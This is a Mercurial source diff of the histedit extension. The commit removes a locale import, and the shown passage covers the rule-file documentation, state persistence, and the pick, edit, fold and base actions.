curses: do not initialize LC_ALL to user settings (issue6358)...
Manuel Jacob
r45550:1bab6b61 stable
@@ -1,2644 +1,2640 @@
1 1 # histedit.py - interactive history editing for mercurial
2 2 #
3 3 # Copyright 2009 Augie Fackler <raf@durin42.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7 """interactive history editing
8 8
9 9 With this extension installed, Mercurial gains one new command: histedit. Usage
10 10 is as follows, assuming the following history::
11 11
12 12 @ 3[tip] 7c2fd3b9020c 2009-04-27 18:04 -0500 durin42
13 13 | Add delta
14 14 |
15 15 o 2 030b686bedc4 2009-04-27 18:04 -0500 durin42
16 16 | Add gamma
17 17 |
18 18 o 1 c561b4e977df 2009-04-27 18:04 -0500 durin42
19 19 | Add beta
20 20 |
21 21 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
22 22 Add alpha
23 23
24 24 If you were to run ``hg histedit c561b4e977df``, you would see the following
25 25 file open in your editor::
26 26
27 27 pick c561b4e977df Add beta
28 28 pick 030b686bedc4 Add gamma
29 29 pick 7c2fd3b9020c Add delta
30 30
31 31 # Edit history between c561b4e977df and 7c2fd3b9020c
32 32 #
33 33 # Commits are listed from least to most recent
34 34 #
35 35 # Commands:
36 36 # p, pick = use commit
37 37 # e, edit = use commit, but stop for amending
38 38 # f, fold = use commit, but combine it with the one above
39 39 # r, roll = like fold, but discard this commit's description and date
40 40 # d, drop = remove commit from history
41 41 # m, mess = edit commit message without changing commit content
42 42 # b, base = checkout changeset and apply further changesets from there
43 43 #
44 44
45 45 In this file, lines beginning with ``#`` are ignored. You must specify a rule
46 46 for each revision in your history. For example, if you had meant to add gamma
47 47 before beta, and then wanted to add delta in the same revision as beta, you
48 48 would reorganize the file to look like this::
49 49
50 50 pick 030b686bedc4 Add gamma
51 51 pick c561b4e977df Add beta
52 52 fold 7c2fd3b9020c Add delta
53 53
54 54 # Edit history between c561b4e977df and 7c2fd3b9020c
55 55 #
56 56 # Commits are listed from least to most recent
57 57 #
58 58 # Commands:
59 59 # p, pick = use commit
60 60 # e, edit = use commit, but stop for amending
61 61 # f, fold = use commit, but combine it with the one above
62 62 # r, roll = like fold, but discard this commit's description and date
63 63 # d, drop = remove commit from history
64 64 # m, mess = edit commit message without changing commit content
65 65 # b, base = checkout changeset and apply further changesets from there
66 66 #
67 67
68 68 At which point you close the editor and ``histedit`` starts working. When you
69 69 specify a ``fold`` operation, ``histedit`` will open an editor when it folds
70 70 those revisions together, offering you a chance to clean up the commit message::
71 71
72 72 Add beta
73 73 ***
74 74 Add delta
75 75
76 76 Edit the commit message to your liking, then close the editor. The date used
77 77 for the commit will be the later of the two commits' dates. For this example,
78 78 let's assume that the commit message was changed to ``Add beta and delta.``
79 79 After histedit has run and had a chance to remove any old or temporary
80 80 revisions it needed, the history looks like this::
81 81
82 82 @ 2[tip] 989b4d060121 2009-04-27 18:04 -0500 durin42
83 83 | Add beta and delta.
84 84 |
85 85 o 1 081603921c3f 2009-04-27 18:04 -0500 durin42
86 86 | Add gamma
87 87 |
88 88 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
89 89 Add alpha
90 90
91 91 Note that ``histedit`` does *not* remove any revisions (even its own temporary
92 92 ones) until after it has completed all the editing operations, so it will
93 93 probably perform several strip operations when it's done. For the above example,
94 94 it had to run strip twice. Strip can be slow depending on a variety of factors,
95 95 so you might need to be a little patient. You can choose to keep the original
96 96 revisions by passing the ``--keep`` flag.
97 97
98 98 The ``edit`` operation will drop you back to a command prompt,
99 99 allowing you to edit files freely, or even use ``hg record`` to commit
100 100 some changes as a separate commit. When you're done, any remaining
101 101 uncommitted changes will be committed as well. When done, run ``hg
102 102 histedit --continue`` to finish this step. If there are uncommitted
103 103 changes, you'll be prompted for a new commit message, but the default
104 104 commit message will be the original message for the ``edit`` ed
105 105 revision, and the date of the original commit will be preserved.
106 106
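A sketch of that round trip, assuming you marked changeset c561b4e977df from
the example history above as ``edit``::

  $ hg histedit c561b4e977df     # set the rule for that changeset to 'edit'
  # ... edit files; optionally 'hg commit' or 'hg record' partial changes ...
  $ hg histedit --continue
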
107 107 The ``message`` operation will give you a chance to revise a commit
108 108 message without changing the contents. It's a shortcut for doing
109 109 ``edit`` immediately followed by ``hg histedit --continue``.
110 110
111 111 If ``histedit`` encounters a conflict when moving a revision (while
112 112 handling ``pick`` or ``fold``), it'll stop in a similar manner to
113 113 ``edit`` with the difference that it won't prompt you for a commit
114 114 message when done. If you decide at this point that you don't like how
115 115 much work it will be to rearrange history, or that you made a mistake,
116 116 you can use ``hg histedit --abort`` to abandon the new changes you
117 117 have made and return to the state before you attempted to edit your
118 118 history.
119 119
120 120 If we clone the histedit-ed example repository above and add four more
121 121 changes, such that we have the following history::
122 122
123 123 @ 6[tip] 038383181893 2009-04-27 18:04 -0500 stefan
124 124 | Add theta
125 125 |
126 126 o 5 140988835471 2009-04-27 18:04 -0500 stefan
127 127 | Add eta
128 128 |
129 129 o 4 122930637314 2009-04-27 18:04 -0500 stefan
130 130 | Add zeta
131 131 |
132 132 o 3 836302820282 2009-04-27 18:04 -0500 stefan
133 133 | Add epsilon
134 134 |
135 135 o 2 989b4d060121 2009-04-27 18:04 -0500 durin42
136 136 | Add beta and delta.
137 137 |
138 138 o 1 081603921c3f 2009-04-27 18:04 -0500 durin42
139 139 | Add gamma
140 140 |
141 141 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
142 142 Add alpha
143 143
144 144 If you run ``hg histedit --outgoing`` on the clone then it is the same
145 145 as running ``hg histedit 836302820282``. If you plan to push to a
146 146 repository that Mercurial does not detect to be related to the source
147 147 repo, you can add a ``--force`` option.
148 148
149 149 Config
150 150 ------
151 151
152 152 Histedit rule lines are truncated to 80 characters by default. You
153 153 can customize this behavior by setting a different length in your
154 154 configuration file::
155 155
156 156 [histedit]
157 157 linelen = 120 # truncate rule lines at 120 characters
158 158
159 159 The summary of a change can be customized as well::
160 160
161 161 [histedit]
162 162 summary-template = '{rev} {bookmarks} {desc|firstline}'
163 163
164 164 The customized summary should be kept short enough that rule lines
165 165 will fit in the configured line length. See above if that requires
166 166 customization.
167 167
168 168 ``hg histedit`` attempts to automatically choose an appropriate base
169 169 revision to use. To change which base revision is used, define a
170 170 revset in your configuration file::
171 171
172 172 [histedit]
173 173 defaultrev = only(.) & draft()
174 174
175 175 By default, each edited revision needs to be present in the histedit commands.
176 176 To remove a revision, you need to use the ``drop`` operation. You can configure
177 177 the drop to be implicit for missing commits by adding::
178 178
179 179 [histedit]
180 180 dropmissing = True
181 181
182 182 By default, histedit will close the transaction after each action. For
183 183 performance purposes, you can configure histedit to use a single transaction
184 184 across the entire histedit. WARNING: This setting introduces a significant risk
185 185 of losing the work you've done in a histedit if the histedit aborts
186 186 unexpectedly::
187 187
188 188 [histedit]
189 189 singletransaction = True
190 190
191 191 """
192 192
193 193 from __future__ import absolute_import
194 194
195 195 # chistedit dependencies that are not available everywhere
196 196 try:
197 197 import fcntl
198 198 import termios
199 199 except ImportError:
200 200 fcntl = None
201 201 termios = None
202 202
203 203 import functools
204 import locale
205 204 import os
206 205 import struct
207 206
208 207 from mercurial.i18n import _
209 208 from mercurial.pycompat import (
210 209 getattr,
211 210 open,
212 211 )
213 212 from mercurial import (
214 213 bundle2,
215 214 cmdutil,
216 215 context,
217 216 copies,
218 217 destutil,
219 218 discovery,
220 219 encoding,
221 220 error,
222 221 exchange,
223 222 extensions,
224 223 hg,
225 224 logcmdutil,
226 225 merge as mergemod,
227 226 mergeutil,
228 227 node,
229 228 obsolete,
230 229 pycompat,
231 230 registrar,
232 231 repair,
233 232 rewriteutil,
234 233 scmutil,
235 234 state as statemod,
236 235 util,
237 236 )
238 237 from mercurial.utils import (
239 238 dateutil,
240 239 stringutil,
241 240 )
242 241
243 242 pickle = util.pickle
244 243 cmdtable = {}
245 244 command = registrar.command(cmdtable)
246 245
247 246 configtable = {}
248 247 configitem = registrar.configitem(configtable)
249 248 configitem(
250 249 b'experimental', b'histedit.autoverb', default=False,
251 250 )
252 251 configitem(
253 252 b'histedit', b'defaultrev', default=None,
254 253 )
255 254 configitem(
256 255 b'histedit', b'dropmissing', default=False,
257 256 )
258 257 configitem(
259 258 b'histedit', b'linelen', default=80,
260 259 )
261 260 configitem(
262 261 b'histedit', b'singletransaction', default=False,
263 262 )
264 263 configitem(
265 264 b'ui', b'interface.histedit', default=None,
266 265 )
267 266 configitem(b'histedit', b'summary-template', default=b'{rev} {desc|firstline}')
268 267
269 268 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
270 269 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
271 270 # be specifying the version(s) of Mercurial they are tested with, or
272 271 # leave the attribute unspecified.
273 272 testedwith = b'ships-with-hg-core'
274 273
275 274 actiontable = {}
276 275 primaryactions = set()
277 276 secondaryactions = set()
278 277 tertiaryactions = set()
279 278 internalactions = set()
280 279
281 280
282 281 def geteditcomment(ui, first, last):
283 282 """ construct the editor comment
284 283 The comment includes::
285 284 - an intro
286 285 - sorted primary commands
287 286 - sorted short commands
288 287 - sorted long commands
289 288 - additional hints
290 289
291 290 Commands are only included once.
292 291 """
293 292 intro = _(
294 293 b"""Edit history between %s and %s
295 294
296 295 Commits are listed from least to most recent
297 296
298 297 You can reorder changesets by reordering the lines
299 298
300 299 Commands:
301 300 """
302 301 )
303 302 actions = []
304 303
305 304 def addverb(v):
306 305 a = actiontable[v]
307 306 lines = a.message.split(b"\n")
308 307 if len(a.verbs):
309 308 v = b', '.join(sorted(a.verbs, key=lambda v: len(v)))
310 309 actions.append(b" %s = %s" % (v, lines[0]))
311 310 actions.extend([b' %s'] * (len(lines) - 1))
312 311
313 312 for v in (
314 313 sorted(primaryactions)
315 314 + sorted(secondaryactions)
316 315 + sorted(tertiaryactions)
317 316 ):
318 317 addverb(v)
319 318 actions.append(b'')
320 319
321 320 hints = []
322 321 if ui.configbool(b'histedit', b'dropmissing'):
323 322 hints.append(
324 323 b"Deleting a changeset from the list "
325 324 b"will DISCARD it from the edited history!"
326 325 )
327 326
328 327 lines = (intro % (first, last)).split(b'\n') + actions + hints
329 328
330 329 return b''.join([b'# %s\n' % l if l else b'#\n' for l in lines])
331 330
332 331
333 332 class histeditstate(object):
334 333 def __init__(self, repo):
335 334 self.repo = repo
336 335 self.actions = None
337 336 self.keep = None
338 337 self.topmost = None
339 338 self.parentctxnode = None
340 339 self.lock = None
341 340 self.wlock = None
342 341 self.backupfile = None
343 342 self.stateobj = statemod.cmdstate(repo, b'histedit-state')
344 343 self.replacements = []
345 344
346 345 def read(self):
347 346 """Load histedit state from disk and set fields appropriately."""
348 347 if not self.stateobj.exists():
349 348 cmdutil.wrongtooltocontinue(self.repo, _(b'histedit'))
350 349
351 350 data = self._read()
352 351
353 352 self.parentctxnode = data[b'parentctxnode']
354 353 actions = parserules(data[b'rules'], self)
355 354 self.actions = actions
356 355 self.keep = data[b'keep']
357 356 self.topmost = data[b'topmost']
358 357 self.replacements = data[b'replacements']
359 358 self.backupfile = data[b'backupfile']
360 359
361 360 def _read(self):
362 361 fp = self.repo.vfs.read(b'histedit-state')
363 362 if fp.startswith(b'v1\n'):
364 363 data = self._load()
365 364 parentctxnode, rules, keep, topmost, replacements, backupfile = data
366 365 else:
367 366 data = pickle.loads(fp)
368 367 parentctxnode, rules, keep, topmost, replacements = data
369 368 backupfile = None
370 369 rules = b"\n".join([b"%s %s" % (verb, rest) for [verb, rest] in rules])
371 370
372 371 return {
373 372 b'parentctxnode': parentctxnode,
374 373 b"rules": rules,
375 374 b"keep": keep,
376 375 b"topmost": topmost,
377 376 b"replacements": replacements,
378 377 b"backupfile": backupfile,
379 378 }
380 379
381 380 def write(self, tr=None):
382 381 if tr:
383 382 tr.addfilegenerator(
384 383 b'histedit-state',
385 384 (b'histedit-state',),
386 385 self._write,
387 386 location=b'plain',
388 387 )
389 388 else:
390 389 with self.repo.vfs(b"histedit-state", b"w") as f:
391 390 self._write(f)
392 391
393 392 def _write(self, fp):
394 393 fp.write(b'v1\n')
395 394 fp.write(b'%s\n' % node.hex(self.parentctxnode))
396 395 fp.write(b'%s\n' % node.hex(self.topmost))
397 396 fp.write(b'%s\n' % (b'True' if self.keep else b'False'))
398 397 fp.write(b'%d\n' % len(self.actions))
399 398 for action in self.actions:
400 399 fp.write(b'%s\n' % action.tostate())
401 400 fp.write(b'%d\n' % len(self.replacements))
402 401 for replacement in self.replacements:
403 402 fp.write(
404 403 b'%s%s\n'
405 404 % (
406 405 node.hex(replacement[0]),
407 406 b''.join(node.hex(r) for r in replacement[1]),
408 407 )
409 408 )
410 409 backupfile = self.backupfile
411 410 if not backupfile:
412 411 backupfile = b''
413 412 fp.write(b'%s\n' % backupfile)
414 413
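# A sketch of the v1 on-disk layout that _write() above produces and _load()
# below parses (nodes are 40-character hex strings, one item per line):
#
#   v1
#   <parentctxnode hex>
#   <topmost hex>
#   True | False                  (the --keep flag)
#   <number of actions>
#   <verb>                        \ two lines per action,
#   <node hex>                    / from histeditaction.tostate()
#   <number of replacements>
#   <original hex><successor hexes, concatenated>     (one line each)
#   <backup file name, possibly empty>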
415 414 def _load(self):
416 415 fp = self.repo.vfs(b'histedit-state', b'r')
417 416 lines = [l[:-1] for l in fp.readlines()]
418 417
419 418 index = 0
420 419 lines[index] # version number
421 420 index += 1
422 421
423 422 parentctxnode = node.bin(lines[index])
424 423 index += 1
425 424
426 425 topmost = node.bin(lines[index])
427 426 index += 1
428 427
429 428 keep = lines[index] == b'True'
430 429 index += 1
431 430
432 431 # Rules
433 432 rules = []
434 433 rulelen = int(lines[index])
435 434 index += 1
436 435 for i in pycompat.xrange(rulelen):
437 436 ruleaction = lines[index]
438 437 index += 1
439 438 rule = lines[index]
440 439 index += 1
441 440 rules.append((ruleaction, rule))
442 441
443 442 # Replacements
444 443 replacements = []
445 444 replacementlen = int(lines[index])
446 445 index += 1
447 446 for i in pycompat.xrange(replacementlen):
448 447 replacement = lines[index]
449 448 original = node.bin(replacement[:40])
450 449 succ = [
451 450 node.bin(replacement[i : i + 40])
452 451 for i in range(40, len(replacement), 40)
453 452 ]
454 453 replacements.append((original, succ))
455 454 index += 1
456 455
457 456 backupfile = lines[index]
458 457 index += 1
459 458
460 459 fp.close()
461 460
462 461 return parentctxnode, rules, keep, topmost, replacements, backupfile
463 462
464 463 def clear(self):
465 464 if self.inprogress():
466 465 self.repo.vfs.unlink(b'histedit-state')
467 466
468 467 def inprogress(self):
469 468 return self.repo.vfs.exists(b'histedit-state')
470 469
471 470
472 471 class histeditaction(object):
473 472 def __init__(self, state, node):
474 473 self.state = state
475 474 self.repo = state.repo
476 475 self.node = node
477 476
478 477 @classmethod
479 478 def fromrule(cls, state, rule):
480 479 """Parses the given rule, returning an instance of the histeditaction.
481 480 """
482 481 ruleid = rule.strip().split(b' ', 1)[0]
483 482 # ruleid can be anything from rev numbers, hashes, "bookmarks" etc.
484 483 # Validate the rule id and get the rule hash
485 484 try:
486 485 rev = node.bin(ruleid)
487 486 except TypeError:
488 487 try:
489 488 _ctx = scmutil.revsingle(state.repo, ruleid)
490 489 rulehash = _ctx.hex()
491 490 rev = node.bin(rulehash)
492 491 except error.RepoLookupError:
493 492 raise error.ParseError(_(b"invalid changeset %s") % ruleid)
494 493 return cls(state, rev)
495 494
496 495 def verify(self, prev, expected, seen):
497 496 """ Verifies semantic correctness of the rule"""
498 497 repo = self.repo
499 498 ha = node.hex(self.node)
500 499 self.node = scmutil.resolvehexnodeidprefix(repo, ha)
501 500 if self.node is None:
502 501 raise error.ParseError(_(b'unknown changeset %s listed') % ha[:12])
503 502 self._verifynodeconstraints(prev, expected, seen)
504 503
505 504 def _verifynodeconstraints(self, prev, expected, seen):
506 505 # by default, commands need a node in the edited list
507 506 if self.node not in expected:
508 507 raise error.ParseError(
509 508 _(b'%s "%s" changeset was not a candidate')
510 509 % (self.verb, node.short(self.node)),
511 510 hint=_(b'only use listed changesets'),
512 511 )
513 512 # and only one command per node
514 513 if self.node in seen:
515 514 raise error.ParseError(
516 515 _(b'duplicated command for changeset %s')
517 516 % node.short(self.node)
518 517 )
519 518
520 519 def torule(self):
521 520 """build a histedit rule line for an action
522 521
523 522 by default lines are in the form:
524 523 <verb> <hash> <rev> <summary>
525 524 """
526 525 ctx = self.repo[self.node]
527 526 ui = self.repo.ui
528 527 summary = (
529 528 cmdutil.rendertemplate(
530 529 ctx, ui.config(b'histedit', b'summary-template')
531 530 )
532 531 or b''
533 532 )
534 533 summary = summary.splitlines()[0]
535 534 line = b'%s %s %s' % (self.verb, ctx, summary)
536 535 # trim to 75 columns by default so it's not stupidly wide in my editor
537 536 # (the 5 more are left for verb)
538 537 maxlen = self.repo.ui.configint(b'histedit', b'linelen')
539 538 maxlen = max(maxlen, 22) # avoid truncating hash
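# For illustration: with the default summary-template ('{rev} {desc|firstline}')
# this renders something like 'pick 7c2fd3b9020c 3 Add delta', truncated by the
# ellipsis below to at most histedit.linelen characters (the floor of 22 exists
# to avoid truncating the hash).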
540 539 return stringutil.ellipsis(line, maxlen)
541 540
542 541 def tostate(self):
543 542 """Print an action in format used by histedit state files
544 543 (the first line is a verb, the remainder is the second)
545 544 """
546 545 return b"%s\n%s" % (self.verb, node.hex(self.node))
547 546
548 547 def run(self):
549 548 """Runs the action. The default behavior is simply apply the action's
550 549 rulectx onto the current parentctx."""
551 550 self.applychange()
552 551 self.continuedirty()
553 552 return self.continueclean()
554 553
555 554 def applychange(self):
556 555 """Applies the changes from this action's rulectx onto the current
557 556 parentctx, but does not commit them."""
558 557 repo = self.repo
559 558 rulectx = repo[self.node]
560 559 repo.ui.pushbuffer(error=True, labeled=True)
561 560 hg.update(repo, self.state.parentctxnode, quietempty=True)
562 561 repo.ui.popbuffer()
563 562 stats = applychanges(repo.ui, repo, rulectx, {})
564 563 repo.dirstate.setbranch(rulectx.branch())
565 564 if stats.unresolvedcount:
566 565 raise error.InterventionRequired(
567 566 _(b'Fix up the change (%s %s)')
568 567 % (self.verb, node.short(self.node)),
569 568 hint=_(b'hg histedit --continue to resume'),
570 569 )
571 570
572 571 def continuedirty(self):
573 572 """Continues the action when changes have been applied to the working
574 573 copy. The default behavior is to commit the dirty changes."""
575 574 repo = self.repo
576 575 rulectx = repo[self.node]
577 576
578 577 editor = self.commiteditor()
579 578 commit = commitfuncfor(repo, rulectx)
580 579 if repo.ui.configbool(b'rewrite', b'update-timestamp'):
581 580 date = dateutil.makedate()
582 581 else:
583 582 date = rulectx.date()
584 583 commit(
585 584 text=rulectx.description(),
586 585 user=rulectx.user(),
587 586 date=date,
588 587 extra=rulectx.extra(),
589 588 editor=editor,
590 589 )
591 590
592 591 def commiteditor(self):
593 592 """The editor to be used to edit the commit message."""
594 593 return False
595 594
596 595 def continueclean(self):
597 596 """Continues the action when the working copy is clean. The default
598 597 behavior is to accept the current commit as the new version of the
599 598 rulectx."""
600 599 ctx = self.repo[b'.']
601 600 if ctx.node() == self.state.parentctxnode:
602 601 self.repo.ui.warn(
603 602 _(b'%s: skipping changeset (no changes)\n')
604 603 % node.short(self.node)
605 604 )
606 605 return ctx, [(self.node, tuple())]
607 606 if ctx.node() == self.node:
608 607 # Nothing changed
609 608 return ctx, []
610 609 return ctx, [(self.node, (ctx.node(),))]
611 610
612 611
613 612 def commitfuncfor(repo, src):
614 613 """Build a commit function for the replacement of <src>
615 614
616 615 This function ensures we apply the same treatment to all changesets.
617 616
618 617 - Add a 'histedit_source' entry in extra.
619 618
620 619 Note that fold has its own separate logic because its handling is a bit
621 620 different and not easily factored out of the fold method.
622 621 """
623 622 phasemin = src.phase()
624 623
625 624 def commitfunc(**kwargs):
626 625 overrides = {(b'phases', b'new-commit'): phasemin}
627 626 with repo.ui.configoverride(overrides, b'histedit'):
628 627 extra = kwargs.get('extra', {}).copy()
629 628 extra[b'histedit_source'] = src.hex()
630 629 kwargs['extra'] = extra
631 630 return repo.commit(**kwargs)
632 631
633 632 return commitfunc
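# The returned commitfunc forwards its arguments to repo.commit() with the
# phase override and the 'histedit_source' extra applied; continuedirty()
# above uses it as:
#   commit = commitfuncfor(repo, rulectx)
#   commit(text=..., user=..., date=..., extra=..., editor=...)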
634 633
635 634
636 635 def applychanges(ui, repo, ctx, opts):
637 636 """Merge changeset from ctx (only) in the current working directory"""
638 637 wcpar = repo.dirstate.p1()
639 638 if ctx.p1().node() == wcpar:
640 639 # edits are "in place": we do not need to perform any merge,
641 640 # just apply the changes on the parent for editing
642 641 ui.pushbuffer()
643 642 cmdutil.revert(ui, repo, ctx, (wcpar, node.nullid), all=True)
644 643 stats = mergemod.updateresult(0, 0, 0, 0)
645 644 ui.popbuffer()
646 645 else:
647 646 try:
648 647 # ui.forcemerge is an internal variable, do not document
649 648 repo.ui.setconfig(
650 649 b'ui', b'forcemerge', opts.get(b'tool', b''), b'histedit'
651 650 )
652 651 stats = mergemod.graft(repo, ctx, labels=[b'local', b'histedit'])
653 652 finally:
654 653 repo.ui.setconfig(b'ui', b'forcemerge', b'', b'histedit')
655 654 return stats
656 655
657 656
658 657 def collapse(repo, firstctx, lastctx, commitopts, skipprompt=False):
659 658 """collapse the set of revisions from first to last as new one.
660 659
661 660 Expected commit options are:
662 661 - message
663 662 - date
664 663 - username
665 664 Commit message is edited in all cases.
666 665
667 666 This function works in memory."""
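# i.e. the folded revision is built as a memctx of memfilectx entries and
# committed with commitctx() at the end; the working copy is not touched here.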
668 667 ctxs = list(repo.set(b'%d::%d', firstctx.rev(), lastctx.rev()))
669 668 if not ctxs:
670 669 return None
671 670 for c in ctxs:
672 671 if not c.mutable():
673 672 raise error.ParseError(
674 673 _(b"cannot fold into public change %s") % node.short(c.node())
675 674 )
676 675 base = firstctx.p1()
677 676
678 677 # commit a new version of the old changeset, including the update
679 678 # collect all files which might be affected
680 679 files = set()
681 680 for ctx in ctxs:
682 681 files.update(ctx.files())
683 682
684 683 # Recompute copies (avoid recording a -> b -> a)
685 684 copied = copies.pathcopies(base, lastctx)
686 685
687 686 # prune files which were reverted by the updates
688 687 files = [f for f in files if not cmdutil.samefile(f, lastctx, base)]
689 688 # commit version of these files as defined by head
690 689 headmf = lastctx.manifest()
691 690
692 691 def filectxfn(repo, ctx, path):
693 692 if path in headmf:
694 693 fctx = lastctx[path]
695 694 flags = fctx.flags()
696 695 mctx = context.memfilectx(
697 696 repo,
698 697 ctx,
699 698 fctx.path(),
700 699 fctx.data(),
701 700 islink=b'l' in flags,
702 701 isexec=b'x' in flags,
703 702 copysource=copied.get(path),
704 703 )
705 704 return mctx
706 705 return None
707 706
708 707 if commitopts.get(b'message'):
709 708 message = commitopts[b'message']
710 709 else:
711 710 message = firstctx.description()
712 711 user = commitopts.get(b'user')
713 712 date = commitopts.get(b'date')
714 713 extra = commitopts.get(b'extra')
715 714
716 715 parents = (firstctx.p1().node(), firstctx.p2().node())
717 716 editor = None
718 717 if not skipprompt:
719 718 editor = cmdutil.getcommiteditor(edit=True, editform=b'histedit.fold')
720 719 new = context.memctx(
721 720 repo,
722 721 parents=parents,
723 722 text=message,
724 723 files=files,
725 724 filectxfn=filectxfn,
726 725 user=user,
727 726 date=date,
728 727 extra=extra,
729 728 editor=editor,
730 729 )
731 730 return repo.commitctx(new)
732 731
733 732
734 733 def _isdirtywc(repo):
735 734 return repo[None].dirty(missing=True)
736 735
737 736
738 737 def abortdirty():
739 738 raise error.Abort(
740 739 _(b'working copy has pending changes'),
741 740 hint=_(
742 741 b'amend, commit, or revert them and run histedit '
743 742 b'--continue, or abort with histedit --abort'
744 743 ),
745 744 )
746 745
747 746
748 747 def action(verbs, message, priority=False, internal=False):
749 748 def wrap(cls):
750 749 assert not priority or not internal
751 750 verb = verbs[0]
752 751 if priority:
753 752 primaryactions.add(verb)
754 753 elif internal:
755 754 internalactions.add(verb)
756 755 elif len(verbs) > 1:
757 756 secondaryactions.add(verb)
758 757 else:
759 758 tertiaryactions.add(verb)
760 759
761 760 cls.verb = verb
762 761 cls.verbs = verbs
763 762 cls.message = message
764 763 for verb in verbs:
765 764 actiontable[verb] = cls
766 765 return cls
767 766
768 767 return wrap
769 768
770 769
771 770 @action([b'pick', b'p'], _(b'use commit'), priority=True)
772 771 class pick(histeditaction):
773 772 def run(self):
774 773 rulectx = self.repo[self.node]
775 774 if rulectx.p1().node() == self.state.parentctxnode:
776 775 self.repo.ui.debug(b'node %s unchanged\n' % node.short(self.node))
777 776 return rulectx, []
778 777
779 778 return super(pick, self).run()
780 779
781 780
782 781 @action([b'edit', b'e'], _(b'use commit, but stop for amending'), priority=True)
783 782 class edit(histeditaction):
784 783 def run(self):
785 784 repo = self.repo
786 785 rulectx = repo[self.node]
787 786 hg.update(repo, self.state.parentctxnode, quietempty=True)
788 787 applychanges(repo.ui, repo, rulectx, {})
789 788 raise error.InterventionRequired(
790 789 _(b'Editing (%s), you may commit or record as needed now.')
791 790 % node.short(self.node),
792 791 hint=_(b'hg histedit --continue to resume'),
793 792 )
794 793
795 794 def commiteditor(self):
796 795 return cmdutil.getcommiteditor(edit=True, editform=b'histedit.edit')
797 796
798 797
799 798 @action([b'fold', b'f'], _(b'use commit, but combine it with the one above'))
800 799 class fold(histeditaction):
801 800 def verify(self, prev, expected, seen):
802 801 """ Verifies semantic correctness of the fold rule"""
803 802 super(fold, self).verify(prev, expected, seen)
804 803 repo = self.repo
805 804 if not prev:
806 805 c = repo[self.node].p1()
807 806 elif not prev.verb in (b'pick', b'base'):
808 807 return
809 808 else:
810 809 c = repo[prev.node]
811 810 if not c.mutable():
812 811 raise error.ParseError(
813 812 _(b"cannot fold into public change %s") % node.short(c.node())
814 813 )
815 814
816 815 def continuedirty(self):
817 816 repo = self.repo
818 817 rulectx = repo[self.node]
819 818
820 819 commit = commitfuncfor(repo, rulectx)
821 820 commit(
822 821 text=b'fold-temp-revision %s' % node.short(self.node),
823 822 user=rulectx.user(),
824 823 date=rulectx.date(),
825 824 extra=rulectx.extra(),
826 825 )
827 826
828 827 def continueclean(self):
829 828 repo = self.repo
830 829 ctx = repo[b'.']
831 830 rulectx = repo[self.node]
832 831 parentctxnode = self.state.parentctxnode
833 832 if ctx.node() == parentctxnode:
834 833 repo.ui.warn(_(b'%s: empty changeset\n') % node.short(self.node))
835 834 return ctx, [(self.node, (parentctxnode,))]
836 835
837 836 parentctx = repo[parentctxnode]
838 837 newcommits = {
839 838 c.node()
840 839 for c in repo.set(b'(%d::. - %d)', parentctx.rev(), parentctx.rev())
841 840 }
842 841 if not newcommits:
843 842 repo.ui.warn(
844 843 _(
845 844 b'%s: cannot fold - working copy is not a '
846 845 b'descendant of previous commit %s\n'
847 846 )
848 847 % (node.short(self.node), node.short(parentctxnode))
849 848 )
850 849 return ctx, [(self.node, (ctx.node(),))]
851 850
852 851 middlecommits = newcommits.copy()
853 852 middlecommits.discard(ctx.node())
854 853
855 854 return self.finishfold(
856 855 repo.ui, repo, parentctx, rulectx, ctx.node(), middlecommits
857 856 )
858 857
859 858 def skipprompt(self):
860 859 """Returns true if the rule should skip the message editor.
861 860
862 861 For example, 'fold' wants to show an editor, but 'rollup'
863 862 doesn't want to.
864 863 """
865 864 return False
866 865
867 866 def mergedescs(self):
868 867 """Returns true if the rule should merge messages of multiple changes.
869 868
870 869 This exists mainly so that 'rollup' rules can be a subclass of
871 870 'fold'.
872 871 """
873 872 return True
874 873
875 874 def firstdate(self):
876 875 """Returns true if the rule should preserve the date of the first
877 876 change.
878 877
879 878 This exists mainly so that 'rollup' rules can be a subclass of
880 879 'fold'.
881 880 """
882 881 return False
883 882
884 883 def finishfold(self, ui, repo, ctx, oldctx, newnode, internalchanges):
885 884 parent = ctx.p1().node()
886 885 hg.updaterepo(repo, parent, overwrite=False)
887 886 ### prepare new commit data
888 887 commitopts = {}
889 888 commitopts[b'user'] = ctx.user()
890 889 # commit message
891 890 if not self.mergedescs():
892 891 newmessage = ctx.description()
893 892 else:
894 893 newmessage = (
895 894 b'\n***\n'.join(
896 895 [ctx.description()]
897 896 + [repo[r].description() for r in internalchanges]
898 897 + [oldctx.description()]
899 898 )
900 899 + b'\n'
901 900 )
902 901 commitopts[b'message'] = newmessage
903 902 # date
904 903 if self.firstdate():
905 904 commitopts[b'date'] = ctx.date()
906 905 else:
907 906 commitopts[b'date'] = max(ctx.date(), oldctx.date())
908 907 # if date is to be updated to current
909 908 if ui.configbool(b'rewrite', b'update-timestamp'):
910 909 commitopts[b'date'] = dateutil.makedate()
911 910
912 911 extra = ctx.extra().copy()
913 912 # histedit_source
914 913 # note: ctx is likely a temporary commit but that's the best we can do
915 914 # here. This is sufficient to solve issue3681 anyway.
916 915 extra[b'histedit_source'] = b'%s,%s' % (ctx.hex(), oldctx.hex())
917 916 commitopts[b'extra'] = extra
918 917 phasemin = max(ctx.phase(), oldctx.phase())
919 918 overrides = {(b'phases', b'new-commit'): phasemin}
920 919 with repo.ui.configoverride(overrides, b'histedit'):
921 920 n = collapse(
922 921 repo,
923 922 ctx,
924 923 repo[newnode],
925 924 commitopts,
926 925 skipprompt=self.skipprompt(),
927 926 )
928 927 if n is None:
929 928 return ctx, []
930 929 hg.updaterepo(repo, n, overwrite=False)
931 930 replacements = [
932 931 (oldctx.node(), (newnode,)),
933 932 (ctx.node(), (n,)),
934 933 (newnode, (n,)),
935 934 ]
936 935 for ich in internalchanges:
937 936 replacements.append((ich, (n,)))
938 937 return repo[n], replacements
939 938
940 939
941 940 @action(
942 941 [b'base', b'b'],
943 942 _(b'checkout changeset and apply further changesets from there'),
944 943 )
945 944 class base(histeditaction):
946 945 def run(self):
947 946 if self.repo[b'.'].node() != self.node:
948 947 mergemod.clean_update(self.repo[self.node])
949 948 return self.continueclean()
950 949
951 950 def continuedirty(self):
